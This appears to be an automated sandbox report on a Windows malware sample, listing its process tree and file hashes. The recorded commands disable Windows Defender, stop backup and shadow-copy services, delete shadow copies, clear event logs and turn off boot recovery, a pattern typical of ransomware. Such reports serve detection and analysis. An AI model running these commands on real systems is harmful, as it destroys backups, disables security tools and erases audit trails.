9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2228 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2876 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2876 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 3600 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 3600 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 996 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 996 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 608 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 608 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 2520 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 2520 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3744 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3744 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3220 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3220 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3576 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe PID 2428 wrote to memory of 3576 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2980
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3784
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:364
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:636
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1248
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:508
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3580
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1036
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12cbe" /y2⤵
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12cbe" /y3⤵PID:2212
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1348
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2304
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1932
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1912
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1964
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2228
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2876
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3600
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12cbe" start= disabled2⤵PID:996
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:608
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2520
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3744
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3220
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3576
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1416
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1652
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1916
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2312
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3784
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3360
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3276
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:728
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1240
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1020
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2508
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:704
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3948
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2212
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2364
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1556
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1064
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3920
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:4012
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3748 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1772 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2928 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3700
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:684
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3424
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3724 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1408
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3400 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3844 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3884 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2996
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3708 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:828 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1248
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
c5697ac0589bf2701ab6a98f0150ce12
SHA1bf8d4435721ee28182417f39dfb93ace9241d449
SHA2565631f2438d0546d7cbcce5c5a8ed77be3a41bb36c12d6c93a3eb326d78eb5b0b
SHA5120d93b4b5e99c2d0595cfa0700cabba8fa239c51b867af909596e59cc5ddcf0befe60d148d4a6dde9cd12f18c5de451f334b29a63f7095f1737006f0e3c37659b